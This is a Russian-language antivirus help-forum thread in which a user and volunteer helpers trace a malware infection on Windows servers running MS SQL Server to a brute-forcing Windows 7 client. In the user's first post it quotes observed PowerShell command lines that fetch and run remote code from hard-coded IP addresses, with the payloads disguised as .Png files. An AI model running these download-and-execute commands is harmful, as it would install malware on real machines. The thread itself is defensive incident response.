Trojan:Win32/HijackSQLServer.AB and Trojan:XML/SuspBuild.MJ!ibt and ISB.Downloader!gen173

[Xxandr]

Доброго дня!

 

Защитник (Trojan:Win32/HijackSQLServer.AB) на Win 2016 ликвидирует вот такие критические угрозы. (скриншот 1 и 2) За день таких попыток вредоносное ПО предпринимает несколько раз. Процесс запускается от пользователя MSSQLSERVER.

В случае Win 2008 и с антивирусом Symantec (ISB.Downloader!gen173) также фиксируются и ликвидируются эти угрозы (скриншот 3), однако уже от пользователя NETWORK SERVICE.

 

В предыдущий раз когда эта проблема была на 2012 винде без антивируса, то эффект был в виде заполнения озу множественными процессами powershell с параметрами типа

 

CmdLine:C:\Windows\System32\cmd.exe /c powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://111.47.22.111:10521/57BC9B7E.Png');MsiMake http://111.47.22.111:10521/0CFA042F.Png
CmdLine:C:\Windows\System32\cmd.exe /c powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://213.59.119.150:14251/57BC9B7E.Png');MsiMake http://213.59.119.150:14251/0CFA042F.Png
CmdLine:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://111.47.22.111:10521/57BC9B7E.Png');MsiMake http://111.47.22.111:10521/0CFA042F.Png
CmdLine:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://213.59.119.150:14251/57BC9B7E.Png');MsiMake http://213.59.119.150:14251/0CFA042F.Png

 

Пожалуйста, помогите побороть эту беду.

[Sandor]

Здравствуйте!

 

Прочтите и выполните Порядок оформления запроса о помощи

[Xxandr]

1. Проверка с помощью Kaspersky Virus Removal Tool выявила вот такую угрозу (скриншот 1).

2. Прикрепил лог

CollectionLog-2023.04.13-09.51.zip

[Sandor]

Дополнительно, пожалуйста:

 

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

[Xxandr]

Готово

Addition.txt FRST.txt

[Sandor]

Разрешения на эти порты задавали самостоятельно?

Цитата

FirewallRules: [{ACDD6BAE-354C-4C3A-A625-07BF69EA9595}] => (Allow) LPort=1303
FirewallRules: [{6D9143FF-6E7F-4AE7-815F-886CE4C1BBEC}] => (Allow) LPort=3381
FirewallRules: [{58CFFC2A-D66F-4D54-B494-1E56BA28AEC3}] => (Allow) LPort=475
FirewallRules: [{04F6DEBB-AF2C-4E9B-9056-F5AD7F131722}] => (Allow) LPort=475

 

[Xxandr]

25 минут назад, Sandor сказал:

Разрешения на эти порты задавали самостоятельно?

 

да. все были сделаны принудительно. Но сейчас вижу что часть из них уже неактуальна, например 475 - правило для этого порта закрываю. А для остальных я сделаю более детальное правила: добавлю приложения, которые эксплуатируют эти порты.

[Sandor]

Да, сделайте это. И некоторое время подождите, попросил подключиться коллегу.

[Xxandr]

ещё одно наблюдение. Я посмотрел время и дни в журналах  Symantec. И оказывается что:

- первая угроза происходит в начале рабочего дня - с 7 до 8 утра. А последняя в конце рабочего дня. Но некоторые сотрудники у нас заканчивают работу по разному: с 15:00 и до 17:00 крайняя ликвидированная угроза за день.

- атаки не происходят на выходных, когда в офисе на 99% нет ПК-юзеров

 

Завтра проведу эксперимент с поочерёдным включением наиболее подозрительных станций.

Изменено 14 апреля, 2023 пользователем Xxandr

[Xxandr]

Ещё.

Решил поизучать журнал SQL сервера. Оказалось, что в тоже самое время (+/- 1 минута) в журнале зафиксированы неудачные попытки подключения к серверу с одного из ПК, который уже изолирован от сети.

Неудача заключается в неправильном пароле. Однако, скорее всего работает перебор паролей, где вирусное ПО всё же подбирает актуальный пароль и осуществляет атаку.

[Sandor]

1 минуту назад, Xxandr сказал:

одного из ПК

Если в сети нет централизованного управления защитой, пройдитесь на каждом ПК хотя бы KVRT.

[Xxandr]

Итак, как и ожидалось, виновник - клиент (ПК) из журнала MSSQL. Причём, это самый обычный ПК юзера для RDP-сеансов,  Windows 7. После его отключения от сети атаки прекратились.

Запустил на нём KVRT.

Найдена вот такая беда - скриншот 1. В карантин не копируется, видимо из-за занятости его системой. Сам файл отсутствует по такому пути C:\Windows\System32\MsB9AB2A36App.dll даже при активации скрытых элементов. Хотя, при повторной проверке KVRT он там находится, судя по отчёту. А ещё KMS драйвер был замечен, и тоже в SYSTEM32. 

Файлы отчёта прикрепляю.

 

reports.zip

[thyrex]

Логи по правилам соберите на той машине.

[Xxandr]

Готово. Спасибо вам за помощь!

CollectionLog-2023.04.15-13.07.zip

[SQ]

Здравствуйте,

HiJackThis (из каталога autologger) профиксить
Важно: необходимо отметить и профиксить только то, что указано ниже.

O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 135 UDP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 139 UDP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 445 UDP) (mirrored) - Action: Block

 

Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS.

Могли бы также проверить пожалуйста, если в вашей базе-данных не появились странные пользователи или задачи?